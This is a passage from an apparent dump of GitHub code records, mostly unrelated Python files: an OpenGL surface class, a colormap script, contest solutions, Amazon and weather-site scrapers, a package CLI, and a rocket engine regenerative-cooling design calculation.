self._texture != None:\n self._texture.set_texture()\n (_XTextureRatio, _YTextureRatio) = self._texture.get_memory_ratio_used()\n if self._texture.get_flip_buffer() == False:\n self._TextureOrder = 0\n else:\n self._TextureOrder = 1\n\n XTextureOffsetPercent = 0.0\n YTextureOffsetPercent = 0.0\n _YAspectRatioOffset = 0.0\n _XAspectRatioOffset = 0.0\n \n XTextureOffset = -XTextureOffsetPercent * _XTextureRatio / 100.0\r\n YTextureOffset = -YTextureOffsetPercent * _YTextureRatio / 100.0 \n \n #FIXME : move this calcul in texture class and do it only one time\n if self._texture.get_apply_aspect_ratio()==True:\n _aspect_ratio = self._texture.get_aspect_ratio()\n #print \">%s for %s x %s , r= %s\"%(_aspect_ratio, self._GLheight, 
self._GLwidth , self._GLheight / float(_aspect_ratio))\n if _aspect_ratio!= None:\n _good_height = self._GLwidth / float(_aspect_ratio)\n if _good_height <= self._GLheight:\n _YAspectRatioOffset = (_YTextureRatio * abs(self._GLheight)) / float(_good_height) - _YTextureRatio\n _GLpixel_YTextureOffset = (abs(self._GLheight) - _good_height) / float(2)\n YTextureOffset -= (_GLpixel_YTextureOffset * float(_YTextureRatio) ) / float(_good_height)\n else:\n _good_width = self._GLheight * float(_aspect_ratio)\n _XAspectRatioOffset = (_XTextureRatio * abs(self._GLwidth)) / float(_good_width) - _XTextureRatio\n _GLpixel_XTextureOffset = (abs(self._GLwidth) - _good_width) / float(2)\n XTextureOffset -= (_GLpixel_XTextureOffset * float(_XTextureRatio) ) / float(_good_width)\n\n #FIXME : use lists\n if self._TextureOrder == 1:\n #Texture for normal coordinate system\r\n glBegin(GL_QUADS)\r\n glTexCoord2f(_XTextureRatio+XTextureOffset+_XAspectRatioOffset,YTextureOffset)\r\n glVertex3f(1.0, 0.0, 0.0)\r\n glTexCoord2f(XTextureOffset,YTextureOffset)\r\n glVertex3f(0.0, 0.0, 0.0)\r\n glTexCoord2f(XTextureOffset,_YTextureRatio+YTextureOffset+_YAspectRatioOffset)\r\n glVertex3f(0.0, 1.0, 0.0)\r\n glTexCoord2f(_XTextureRatio+XTextureOffset+_XAspectRatioOffset,_YTextureRatio+YTextureOffset+_YAspectRatioOffset)\r\n glVertex3f(1.0, 1.0, 0.0)\r glEnd()\n else:\n #Texture for Videos \n glBegin(GL_QUADS)\r\n glTexCoord2f(_XTextureRatio+XTextureOffset+_XAspectRatioOffset,YTextureOffset)\n glVertex3f(1.0, 1.0, 0.0)\r\n glTexCoord2f(XTextureOffset,YTextureOffset)\r\n glVertex3f(0.0, 1.0, 0.0)\r\n glTexCoord2f(XTextureOffset,_YTextureRatio+YTextureOffset+_YAspectRatioOffset)\r\n glVertex3f(0.0, 0.0, 0.0) \r\n glTexCoord2f(_XTextureRatio+XTextureOffset+_XAspectRatioOffset,_YTextureRatio+YTextureOffset+_YAspectRatioOffset)\r\n glVertex3f(1.0, 0.0, 0.0)\r glEnd() \n \n if self._texture != None :\n self._texture.unset_texture()\n \n glPopMatrix()\n \n def SetSize(self, Width, Height):\n zBaseClass.SurfaceBase.SetSize(self, Width, Height)\n if self._ApplyCoordinateTrans == True:\n if self._renderer==None:\n self._renderer = constants.GetForm()._GetRenderer()\n self._worldwidth, self._worldheight = self._renderer.GetWorldSize()\n self._GLwidth = Width * self._worldwidth / float(self._screenwidth)\n self._GLheight = Height * self._worldheight / float(self._screenheight)\n else:\n self._GLwidth = Width\n self._GLheight = Height\n \n def SetLocation(self, x, y, z):\n zBaseClass.SurfaceBase.SetLocation(self, x, y, z)\n self._GLposZ = z\n if self._ApplyCoordinateTrans == True:\n if self._renderer==None:\n self._renderer = constants.GetForm()._GetRenderer()\n self._worldwidth, self._worldheight = self._renderer.GetWorldSize()\n self._GLposX = (x*self._worldwidth / float(self._screenwidth)) - float(self._worldwidth/2)\n self._GLposY = float(self._worldheight/2) - (y*self._worldheight / float(self._screenheight)) \n else:\n self._GLposX = x\n self._GLposY = y\r\n \n def ApplyRotation(self, Rotate):\n assert isinstance(Rotate, Point3D) , \"Rotate has wrong type\"\r\n glRotatef(Rotate.x, 1.0, 0.0, 0.0)\r\n glRotatef(Rotate.y, 0.0, 1.0, 0.0)\r\n glRotatef(Rotate.z, 0.0, 0.0, 1.0)\r\n\n def GetTexture(self):\n return self._texture\n \n def SetTexture(self, texture):\n self._texture = 
texture\n","repo_name":"BackupTheBerlios/elisa-svn","sub_path":"trunk/extern/testGL/zAPI/zRenderer/zOpenGLSurface.py","file_name":"zOpenGLSurface.py","file_ext":"py","file_size_in_byte":7893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"1182543125","text":"\"\"\"Hackery.\"\"\"\nimport matplotlib.colors as mpcolors\n\n# Make colormap (based off of\n# http://cimss.ssec.wisc.edu/goes/visit/water_vapor_enhancement.html):\ncolors = [\n \"#000000\",\n \"#00FFFF\",\n \"#006C00\",\n \"#FFFFFF\",\n \"#0000A6\",\n \"#FFFF00\",\n \"#FF0000\",\n \"#000000\",\n \"#000000\",\n]\ncints = [-109.5, -109.0, -75.0, -47.0, -30.0, -15.5, 0.0, 0.5, 54.5]\ncints = [(float(c + 109.5) / float(54.5 + 109.5)) for c in cints]\ncolorList = []\nfor i in list(range(0, len(cints))):\n colorList.append((cints[i], colors[i]))\ncmap = mpcolors.LinearSegmentedColormap.from_list(\"mycmap\", colorList)\nfor i in range(256):\n val = -109.5 + (i / 255) * (54.5 + 109.5)\n c = cmap(i / 255.0)\n print(\"%.2f %.0f %.0f %.0f\" % (val, c[0] * 255, c[1] * 255, c[2] * 255))\n# vmax = 54.4\n# vmin = -109.\n","repo_name":"akrherz/pyWWA","sub_path":"goes/wv_cmap.py","file_name":"wv_cmap.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"2"} +{"seq_id":"10677121472","text":"from sys import stdin\r\n\r\n\r\ndef main():\r\n input = stdin.readline\r\n a, b, c, x, y = map(int, input().split())\r\n res1 = (2*c)*min(x, y) + a*(x-min(x, y)) + b*(y-min(x, y))\r\n res2 = a*x + b*y\r\n res3 = 2*c*max(x, y)\r\n\r\n print(min(res1, res2, res3))\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"yu2799/AtCoder","sub_path":"abc/100/100/95C.py","file_name":"95C.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"37769130904","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def levelOrder(self, root: Optional[TreeNode]) -> List[List[int]]:\n \n if root is None:\n return []\n \n deque = []\n deque.append(root)\n value_list = [] # to be returned\n \n while deque:\n size_of_same_level = len(deque)\n values_of_same_level = []\n \n while size_of_same_level: # here is a good idea since we only iterate nodes of a certain level in each outer loop\n node = deque.pop(0)\n \n values_of_same_level.append(node.val)\n if node.left:\n deque.append(node.left)\n if node.right:\n deque.append(node.right)\n \n size_of_same_level -= 1\n \n value_list.append(values_of_same_level)\n \n return value_list\n","repo_name":"mershaywu77/leet_code","sub_path":"102/sol_1.py","file_name":"sol_1.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"30993739133","text":"import re\nfrom multiprocessing import Pool, Lock\nfrom Tools import get_html\n\n\ndef handle(asin):\n asin = asin.strip()\n try:\n baseurl = \"https://www.amazon.ca/dp/[asin]\"\n url = baseurl.replace('[asin]', asin)\n print (asin)\n html = get_html.get_html_src(url)\n robot_check = re.findall('Robot Check', html)\n if robot_check:\n lock.acquire()\n captcha_url_file.write(asin + '\\n')\n captcha_url_file.flush()\n lock.release()\n print (\"robot_check\")\n else:\n error404 = re.findall(\"We're sorry. 
The Web address you entered is not a functioning page on our site\", html)\n            if error404:\n                lock.acquire()\n                not_list_file.write(asin + '\\n')\n                not_list_file.flush()\n                lock.release()\n                print (\"not exist\")\n            else:\n                buyboxinfo = [asin]\n                price = re.findall(r'New from CDN\\$ (.*?)\\n', html)[0]\n                buyboxinfo.append(str(price))\n                lock.acquire()\n                result_file.write(\"\\t\".join(buyboxinfo) + \"\\n\")\n                result_file.flush()\n                success_asin_file.write(asin + '\\n')\n                success_asin_file.flush()\n                lock.release()\n                print (\"success\")\n    except Exception as e:\n        print (str(e))\n        lock.acquire()\n        captcha_url_file.write(asin + '\\n')\n        captcha_url_file.flush()\n        lock.release()\n        print (\"error: not html\")\n\n\ndef create_titles(filename, titles):\n    f = open(filename, \"a\")\n    f.write(\"\\t\".join(titles) + \"\\n\")\n    f.flush()\n    f.close()\n\n\ndef get_fba_buybox(asinfile, fbainfofile):\n    print (\"run start...\")\n    global result_file  # results file\n    global captcha_url_file  # captcha pages\n    global not_list_file  # delisted pages\n    # global not_crawl_file  # pages that still failed after 3 crawl attempts, nothing captured\n    global success_asin_file\n    global lock, tool\n\n    lock = Lock()\n    captcha_url_file = open(\"./result/not_get\", \"a\")\n    not_list_file = open(\"./result/not_found.txt\", \"a\")\n    success_asin_file = open(\"./result/success_asin.txt\", \"a\")\n\n    titles = ['asin', 'price']\n\n    create_titles(fbainfofile, titles)\n    result_file = open(fbainfofile, \"a\")\n\n    file_asin = open(asinfile, 'r')\n    asins = file_asin.readlines()\n\n    pool = Pool(40)\n    pool.map(handle, asins)\n    pool.close()\n    pool.join()\n\n    file_asin.close()\n    result_file.close()\n    captcha_url_file.close()\n    not_list_file.close()\n    success_asin_file.close()\n\n    print (\"run over\")\n\n\nif __name__ == '__main__':\n    asinfile = './asins.txt'\n    buyboxinfofile = './exit_ca111.csv'\n    get_fba_buybox(asinfile, buyboxinfofile)  # crawl the buybox data","repo_name":"mylove1/LiuFan_Spider","sub_path":"Shopping_Web/Romance/ca.py","file_name":"ca.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
{"seq_id":"7919441079","text":"import requests\r\nimport re\r\nimport os\r\nimport time\r\nimport datetime\r\nimport random\r\nimport openpyxl\r\nfrom openpyxl import load_workbook\r\n\r\n# settings you must change\r\n# city to query\r\nCity = \"beijing\"\r\n# query start & end dates\r\ntimeBegin = \"20220814\"\r\ntimeEnd = \"20220815\"\r\n\r\n# URL constants\r\nwebsite = \"https://www.tianqi.com\"\r\nTemperature = '(-?[0-9]*?)~(-?[0-9]*?)°'\r\nUserAgent = {\r\n    'User-Agent':\r\n        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) \\\r\n        AppleWebKit/537.36 (KHTML, like Gecko) \\\r\n        Chrome/99.0.4844.84 Safari/537.36'\r\n    }\r\n\r\n# fetch one city's temperature for a given day\r\ndef getTemp( city, date):\r\n    s = requests.session()\r\n    rs = s.get(website + \"/tianqi/\" + city + \"/\" + date + \".html\", headers=UserAgent)\r\n    temp = re.search(Temperature, rs.text, re.S)\r\n    return date,int(temp.group(1)),int(temp.group(2))\r\n\r\n# main\r\nif __name__ == '__main__':\r\n\r\n    i = 2\r\n\r\n    # bound the date range\r\n    begin = datetime.date( \\\r\n        int(timeBegin[0:4]), \\\r\n        int(timeBegin[4:6]), \\\r\n        int(timeBegin[6:8]))\r\n    end = datetime.date( \\\r\n        int(timeEnd[0:4]), \\\r\n        int(timeEnd[4:6]), \\\r\n        int(timeEnd[6:8]))\r\n    delta = datetime.timedelta(days=1)\r\n\r\n    # open the excel workbook\r\n    tempWb = openpyxl.Workbook()\r\n    tempWs = tempWb.active\r\n    \r\n    # write the header row\r\n    tempWs.cell(1, 1, value=\"date\")\r\n    tempWs.cell(1, 2, value=\"min\")\r\n    tempWs.cell(1, 3, value=\"max\")\r\n\r\n    while begin <= end:\r\n        nowdate = 
begin.strftime(\"%Y%m%d\")\r\n        tp = getTemp( City, nowdate)\r\n        tempWs.cell(i, 1, value=tp[0])\r\n        tempWs.cell(i, 2, value=tp[1])\r\n        tempWs.cell(i, 3, value=tp[2])\r\n        begin += delta\r\n        time.sleep(random.randint(5,20)/10)\r\n        i += 1\r\n        #debug\r\n        print(tp)\r\n\r\n    # save the workbook\r\n    tempWb.save(City + \"_\" + timeBegin + \"_\" +timeEnd + \".xlsx\")","repo_name":"yishunzhikong/getTemperature","sub_path":"getTemperature.py","file_name":"getTemperature.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
{"seq_id":"33401598657","text":"\"\"\"How many words start with 'a' in a sentence?\"\"\"\n\n\ndef startA(str):\n    str = str.split()  # split string into a list\n    count = 0\n    for i in str:\n        firstLetter = i[0]\n        if firstLetter.lower() == 'a':  # see if first letter is 'a'\n            count += 1  # increment count\n    return count\n\n\"\"\"Is a user entered value a number?\"\"\"\n\n\ndef isNum(userInput):\n    return userInput.isdigit()  # returns true only if every character is a digit\nisNum(raw_input(\"Enter a number: \"))\n\n\"\"\"Can a computer do mad libs?\"\"\"\n\n\ndef madLibs():\n    verb = raw_input(\"Enter a verb ending in ing: \")\n    noun = raw_input(\"Enter a plural noun: \")\n    adj = raw_input(\"Enter an adjective: \")\n    print('\"There are too many %s %s on this %s plane!\" he screamed.' % (verb, noun, adj))\nmadLibs()\n","repo_name":"meslater1030/sea-c34-python","sub_path":"students/MeganSlater/session02/string.py","file_name":"string.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"}
{"seq_id":"29582815305","text":"a=input()\n# (()[[]])([])\nstack =[]\nans = 0\ntemp=1\nfor i in range(len(a)):\n    if(a[i] == \"(\" ):\n        stack.append(a[i])\n        temp*=2\n    elif(a[i] == \")\"):\n        if( not stack or stack[-1]!=\"(\" ):\n            ans=0\n            break\n        if(a[i-1]==\"(\"):\n            ans+=temp\n\n        temp//=2\n        stack.pop()\n\n    elif (a[i] == \"[\"):\n        stack.append(a[i])\n        temp*=3\n    elif (a[i] == \"]\"):\n        if (not stack or stack[-1] != \"[\"):\n            ans = 0\n            break\n        if (a[i - 1] == \"[\"):\n            ans += temp\n        temp //= 3\n        stack.pop()\n\nif stack:\n    print(0)\nelse:\n    print(ans)\n\n# the key step: when popping from the stack, divide temp back down by 2 or 3 after comparing with the matching opener","repo_name":"jeonbar2/Coding_Test","sub_path":"Boj/DataStructure/괄호의값.py","file_name":"괄호의값.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
{"seq_id":"239517972","text":"\"\"\"\n    This script is the QuaKe package entry point. 
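(For example, \`quake -l DEBUG datagen ...\` runs dataset generation with verbose logging, using only the flags and subcommands defined by the parser below.) 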
Parses the subcommands from\n command line and calls the appropriate function to run.\n\n Main help output:\n\n ```\n usage: quake [-h] {datagen,train} ...\n \n quake\n \n positional arguments:\n {datagen,train}\n datagen generate voxelized dataset from root files\n train train model\n \n optional arguments:\n -h, --help show this help message and exit\n \n ```\n\n\"\"\"\nimport logging\nimport argparse\nfrom time import time as tm\nfrom quake import PACKAGE\nfrom quake.dataset.generate import add_arguments_datagen\nfrom quake.models.train import add_arguments_train\n\nlogger = logging.getLogger(PACKAGE)\n\n\ndef main():\n \"\"\"Defines the QuaKe main entry point.\"\"\"\n parser = argparse.ArgumentParser(description=\"quake\")\n\n log_levels = [\"DEBUG\", \"INFO\", \"WARNING\", \"ERROR\", \"CRITICAL\"]\n parser.add_argument(\n \"-l\", default=None, help=\"set logging level\", choices=log_levels, dest=\"logging\"\n )\n\n subparsers = parser.add_subparsers()\n\n # preprocess dataset\n gen_msg = \"generate voxelized dataset from root files\"\n gen_subparser = subparsers.add_parser(\n \"datagen\", description=gen_msg, help=gen_msg.lower().split(\":\")[0]\n )\n add_arguments_datagen(gen_subparser)\n\n # train\n train_msg = \"train model\"\n train_subparser = subparsers.add_parser(\n \"train\", description=train_msg, help=train_msg.lower().split(\":\")[0]\n )\n add_arguments_train(train_subparser)\n\n args = parser.parse_args()\n\n # setting global logging level\n if args.logging:\n logger.warning(f\"Setting log level to {args.logging}\")\n logger.setLevel(args.logging)\n logger.handlers[0].setLevel(args.logging)\n\n # execute parsed function\n start = tm()\n args.func(args)\n logger.info(f\"Program done in {tm()-start} s\")\n","repo_name":"qismib/QuaKe","sub_path":"src/quake/scripts/quake.py","file_name":"quake.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"239517972","text":"\"\"\"\nEngine Design Code Top Level Script\n\nauthor: tcharlson\n\"\"\"\n\n# Public Modules\nfrom datetime import datetime\nstartTime = datetime.now()\nimport copy\nimport os\nimport numpy as np\nfrom scipy.optimize import fsolve\nfrom tqdm import tqdm\n\n# Custom Modules\nfrom geometry import chamber_geo, define_contour, plot_chamber_param\nfrom nozzle_thermo import chamber_thermo_calcs, t_adiabatic_wall, gnielinski_calc, plot_chamber_thermo, \\\n func_bartz_root_find, load_regen_geometry, soot_thermal_resistance\nfrom kerosene_props import get_jet_a_properties\nfrom engine_sizing_run import size_combustor, propellant\n\n\n### DEFINE TOP LEVEL PARAMETERS ###\nfuel = propellant(\"Kerosene\")\nox = propellant(\"LOX\")\n\n### PERFORMANCE PARAMS ###\nPc = 21.0 #bar\nPc_pa = Pc * 10**5 # chamber pressure in Pascals\nPe = 1.01325 #bar\nthrust = 3000 #newton\n# 2250 -> ~500lbf\n# 4500 -> ~1000 lbf\nMR = 1.7\neta_cstar = 0.9 # guess\npressure_ratio = Pe/Pc\nprint(f'pressure_ratio = {pressure_ratio}')\nprint(f'Pc/Pe = {Pc/Pe}')\n\nffc_pct = 0.15 # % FFC Mass fraction\n\n### GEOMETRIC PARAMS ###\nfac_CR = 7.0 #contraction ratio\nchamber_ha = 30.0 #degrees, chamber half angle\nnozzle_ha = 15.0 #degrees, nozzle half angle; conical nozzle\nL_star = 1.15 #meters - http://mae-nas.eng.usu.edu/MAE_5540_Web/propulsion_systems/section6/section.6.1.pdf guess for now\nnpts = 100 #number of points to define each contour section\nCHANNEL_CONFIG = 'regen_cfg.yaml' # config file name for regen parameters\n\n\nf_inj_stiff = 20.0 # 
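injector pressure-drop stiffness margin relative to Pc, in 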
percent\nP_f_inj = (1+(f_inj_stiff/100))*Pc\n\nBAR = True\nDEBUG = False\n\neng, T_c, T_t, R_specific, k, opt_expansion, v_e_ideal = size_combustor(Pc,MR,thrust,fac_CR,ox,fuel,pressure_ratio)\n\ncstar_ideal = np.sqrt(k*R_specific*T_c)/(k*np.sqrt((2/(k+1))**((k+1)/(k-1))))\ncstar_corr = eta_cstar*cstar_ideal\nprint(f'C*, ideal = {cstar_ideal} m/s - eta_C* = {eta_cstar}\\n'\n f'C*, corr = {cstar_corr} m/s')\n\nprint('\\n### COMBUSTOR MASS FLOWS ###')\nmdot_ideal_total = thrust/v_e_ideal\nprint(f'mdot_ideal_total = {mdot_ideal_total} kg/s\\n')\n\nmdot_ox_ideal = (MR/(1+MR))*mdot_ideal_total\nmdot_fuel_ideal = mdot_ideal_total - mdot_ox_ideal\nmdot_fuel_regen = mdot_fuel_ideal*(1+ffc_pct)\nprint(f'mdot_f (ideal) = {mdot_fuel_ideal} kg/s')\nprint(f'mdot_f (regen) = {mdot_fuel_regen} kg/s')\nprint(f'mdot_f_ffc = {mdot_fuel_ideal*ffc_pct} kg/s')\nprint(f'mdot_o (ideal) = {mdot_ox_ideal} kg/s')\n\nA_t = (mdot_ideal_total/(Pc*10**5))*np.sqrt((R_specific*T_c)/(k*((2/(k+1))**((k+1)/(k-1)))))\n#A_t_cm = A_t*(100**2)\nA_t_mm = A_t*(1000**2)\nR_t_mm = np.sqrt(A_t_mm/np.pi)\nD_t_mm = R_t_mm*2\nprint(f'A_throat = {A_t_mm} mm**2')\nprint(f'R_throat = {R_t_mm} mm, D_throat = {D_t_mm} - ({D_t_mm/25.4} in)\\n')\n\nA_c_mm = fac_CR*A_t_mm\nR_c_mm = np.sqrt(A_c_mm/np.pi)\nD_c_mm = R_c_mm*2\nprint(f'A_chamber = {A_c_mm} mm**2')\nprint(f'R_chamber = {R_c_mm} mm, D_chamber = {D_c_mm} - ({D_c_mm/25.4} in)\\n')\n\nA_e_mm = opt_expansion*A_t_mm\nR_e_mm = np.sqrt(A_e_mm/np.pi)\nD_e_mm = R_e_mm*2\nprint(f'A_exit = {A_e_mm} mm**2')\nprint(f'R_exit = {R_e_mm} mm, D_exit = {D_e_mm} - ({D_e_mm/25.4} in)\\n')\n\nprint(f\"Ideal CR (mae_5540) = 8.0/D_t**3/5 + 1.25 = {8.0/((D_t_mm/10)**(3/5))+1.25}\")\n\nprint(f'sanic {eng.combustor_obj.get_SonicVelocities(Pc=Pc,MR=MR,eps=opt_expansion)}')\n\nprint('\\n#### CALCULATING CHAMBER GEOMETRIC PROPERTIES ####')\nchamber_obj = chamber_geo(A_t_mm, R_t_mm, A_c_mm, R_c_mm, A_e_mm, R_e_mm)\nchamber_raw,i_t = define_contour(chamber_obj, L_star, nozzle_ha, chamber_ha, PLOT=False)\nchamber = copy.deepcopy(chamber_raw) # save raw copy of chamber data for export\nchamber_raw.to_csv(os.path.join(os.getcwd(), 'output', 'chamber_raw.csv'))\n\nprint('\\n#### RAW CHAMBER GEOMETRY EXPORTED ####')\n# seed heat transfer analysis\n# At the moment, am not super confident in the CEA output for transport props, does not seem to match CEA web unlike P/T props\n# Running case in CEA Web App and manually inputting the below\nmu = 0.91*0.0001 # millipoise -> Pa.s\nCp = 3.25*10**3 # J/kg.K (need to convert)\nPr = 0.50 # avg from CEA output with lower bias\n#mod with eta cstar\nRC_throat = 0.015 # radius of curvature at throat - spoof 15mm for now\n\ncond_w = 350 # copper, W/m.K - conservatively low bound\nC = 0.026 # Bartz constant\n\n# compute 4x bartz constants which do not vary over nozzle\nb1 = (C/((D_t_mm/1000)**0.2)) # first constant in bartz correlation C/Dt**0.2 - diameter correlation\nb2 = ((mu**0.2)*Cp)/(Pr**0.6) # 2nd constant - mu**0.2.Cp/Pr**0.6 - transport props\nb3 = (Pc_pa/(cstar_ideal))**0.8 # 3rd constant - Pc correlation - use ideal C* to be conservative\nb4 = ((D_t_mm/1000)/RC_throat)**0.1 # 4th constant - throat curvature correction\nbartz_mult = b1*b2*b3*b4\n\nchamber = chamber_thermo_calcs(chamber, k, R_specific, T_c, Pc) # populate flow props vs station - isentropic\nchamber = load_regen_geometry(chamber, CHANNEL_CONFIG)\n\nchamber['A_chan'] = chamber['w_chan'] * chamber['d_chan'] # mm**2\nchamber['D_hyd'] = 2*chamber['A_chan']/(chamber['w_chan'] + chamber['d_chan']) # 
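hydraulic diameter of a rectangular channel, 2*A/(w+d), in 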
mm\nchamber['mdot_chan'] = mdot_fuel_regen/chamber['n_chan']\n\nT_eth_0 = 300 # K - assume roomish temp 70F\ni_n = len(chamber.index) - 1 # grab i of nth index\n# seed coolant temp params, and then set starting coolant temp\nfor parm in ['T_c_i','dT_c','T_c_e','P_c_i','dP_c','P_c_e']:\n chamber[parm] = np.zeros(len(chamber.index))\nchamber.at[i_n,'T_c_i'] = T_eth_0\n\nT_wg_guess = 700\nT_wc_guess = T_wg_guess - 100\nq_guess = 1.0E06\nHT_SOLVE_GUESS = [T_wg_guess, T_wc_guess, q_guess]\n\n### Do heat transfer ###\nfor i in tqdm(range(len(chamber.index))[::-1]):\n # NOTE: iterate thru in reverse\n if i > 0:\n # stop at 0th pt, will march upstream & use i-1th pt for area dx calc\n\n #grab transpo props for Bartz\n M = chamber.at[i,'mach']\n eps = chamber.at[i,'eps']\n AR_factor = (1 / eps) ** 0.9\n\n # Calculate HT geometry\n chamber.at[i,'dx'] = chamber.at[i,'x'] - chamber.at[i-1,'x'] # mm\n # Slant Area: https://www.calculatorsoup.com/calculators/geometry-solids/conicalfrustum.php\n # S = π * (r1 + r2) * s = π * (r1 + r2) * √((r1 - r2)2 + h2)\n chamber.at[i,'s'] = np.sqrt(((chamber.at[i,'r']-chamber.at[i-1,'r'])**2)+chamber.at[i,'dx']**2) # mm - slant height/linear dist travelled\n chamber.at[i, 'A_w_segment'] = np.pi * (chamber.at[i,'r']+chamber.at[i - 1,'r']) * chamber.at[i,'s'] # mm**2\n # Calc Adiabatic Wall Temp\n chamber.at[i,'T_aw'] = t_adiabatic_wall(T_c,Pr,M,k)\n chamber.at[i,'R_soot'] = soot_thermal_resistance(chamber.at[i,'eps'],chamber.at[i,'regime']) # (m**2 K)/W - Huzel & Huang\n\n #Get coolant inlet properties:\n rho_c, cp_c, cond_c, visc_c = get_jet_a_properties(chamber.at[i,'T_c_i'])\n chamber.at[i,'rho_c'] = rho_c\n chamber.at[i,'cp_c'] = cp_c\n chamber.at[i,'cond_c'] = cond_c\n chamber.at[i,'visc_c'] = visc_c\n chamber.at[i,'u_c'] = chamber.at[i,'mdot_chan']/(chamber.at[i,'rho_c']*(chamber.at[i,'A_chan']/(1000**2))) # Coolant Velo - m/s\n chamber.at[i,'t_transit'] = chamber.at[i,'s']/(chamber.at[i,'u_c']*1000)\n chamber.at[i,'Re_c'] = (chamber.at[i,'rho_c']*(chamber.at[i,'D_hyd']/1000)*chamber.at[i,'u_c'])/chamber.at[i,'visc_c'] # Coolant Re; convert D_hyd to m\n chamber.at[i,'Pr_c'] = (chamber.at[i,'cp_c']*chamber.at[i,'visc_c'])/chamber.at[i,'cond_c']\n chamber.at[i,'f_darcy'] = (0.79*np.log(chamber.at[i,'Re_c']) - 1.64)**(-2) # Petukhov correlation; Incorpera pg.490\n chamber.at[i,'Nu_c'] = gnielinski_calc(chamber.at[i,'f_darcy'], chamber.at[i,'Re_c'], chamber.at[i,'Pr_c'])\n chamber.at[i,'h_c'] = chamber.at[i, 'Nu_c'] * chamber.at[i, 'cond_c'] / (chamber.at[i, 'D_hyd']/1000) # Coolant h_c; convert D_hyd to mm\n\n # Run 1D heat transfer solver using Numpy Root Find\n T_c_MOD = 1.0\n data = (chamber.at[i,'t_wall']/1000,\n cond_w,\n bartz_mult*AR_factor,\n T_c/T_c_MOD,\n chamber.at[i, 'T_c_i'],\n chamber.at[i, 'h_c'],\n chamber.at[i, 'T_aw'],\n M,\n k,\n chamber.at[i, 'R_soot']) #create args for solver\n\n qmod = 1.0\n root = fsolve(func_bartz_root_find,HT_SOLVE_GUESS,args=data)\n chamber.at[i, 'T_wg'] = root[0]\n chamber.at[i, 'T_wc'] = root[1]\n chamber.at[i, 'q_tot'] = root[2]/qmod\n chamber.at[i, 'dT_c'] = (chamber.at[i,'q_tot']*chamber.at[i,'A_w_segment']/(1000.0**2))/(mdot_fuel_ideal*chamber.at[i,'cp_c'])\n chamber.at[i, 'T_c_e'] = chamber.at[i, 'T_c_i'] + chamber.at[i, 'dT_c']\n chamber.at[i - 1, 'T_c_i'] = chamber.at[i, 'T_c_e']\n # calculate darcy-weisbach pressure drop\n # https://en.wikipedia.org/wiki/Darcy%E2%80%93Weisbach_equation\n chamber.at[i, 'dP_c'] = (chamber.at[i,'s']/1000 * 
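\n            # Darcy-Weisbach head loss: f * (L/D) * (rho * u**2 / 2); the trailing /1e5 converts Pa to bar\n            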
(chamber.at[i,'f_darcy']*(chamber.at[i,'rho_c']/2)*((chamber.at[i,'u_c']**2)/(chamber.at[i,'D_hyd']/1000))))/10**5 # dP in Bar\n\n if DEBUG:\n print(root)\n\n else:\n # populate final station with non-NAN values\n # i = 0\n keys = [key for key in chamber.keys() if key not in ['x', 'r', 'theta', 'eps', 'regime']]\n for key in keys:\n chamber.at[0, key] = chamber.at[1, key]\n\n# Invert Coolant Pressure Vectors to match flow direction\nchamber.at[0,'P_c_e'] = P_f_inj\nfor i in range(len(chamber.index)-1):\n chamber.at[i,'P_c_i'] = chamber.at[i,'P_c_e'] + chamber.at[i,'dP_c']\n chamber.at[i+1,'P_c_e'] = chamber.at[i,'P_c_i']\n\n# Plot thermo outputs\nfig = plot_chamber_thermo(chamber,eng)\nfig.tight_layout()\nfig.show()\n\nchamber_OD_w_cooling = np.round(np.max(chamber[\"r_outer\"]),2)*2\n\n# Console Output\nprint(f'Chamber OD w/Cooling = {chamber_OD_w_cooling} [mm] ({chamber_OD_w_cooling/25.4} [in])\\n')\nprint(f'Regen Inlet Pressure = {chamber.at[i_n,\"P_c_e\"]} [BarA]')\nprint(f'Injector Inlet Pressure = {chamber.at[0,\"P_c_e\"]} [BarA]\\n')\nprint(f'Regen Stiffness = {100*(chamber.at[i_n,\"P_c_e\"] - chamber.at[0,\"P_c_e\"])/chamber.at[0,\"P_c_e\"]} [%]\\n')\nprint(f'Injector Inlet Fuel Props:')\nprint(f'T_c = {chamber.at[0,\"T_c_e\"]} [K]')\nprint(f'rho_c = {chamber.at[0,\"rho_c\"]} [kg/s]')\nprint(f'visc_c = {chamber.at[0,\"visc_c\"]} [Pa.s]')\n\n# Save final chamber output case\nchamber.to_csv(os.path.join(os.getcwd(),'output','chamber_final.csv'))\n\n# Time Benchmark\nprint(f'\\nScript Runtime: {datetime.now() - startTime} [s]')\n\n\n\n","repo_name":"trenton-charlson/engine-dev","sub_path":"engine_design_code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10355,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"11836194052","text":"import json\nimport os\nfrom pathlib import Path\nfrom typing import Union, Any\n\nfrom modules.app_globals import Resource, UI_PATH, UI_PATHS_FILE, SETTINGS_FILE\nfrom modules.app_globals import get_settings_dir\nfrom modules.detect_language import setup_translation\n\n\ndef delayed_log_setup():\n from modules.log import init_logging\n global LOGGER\n LOGGER = 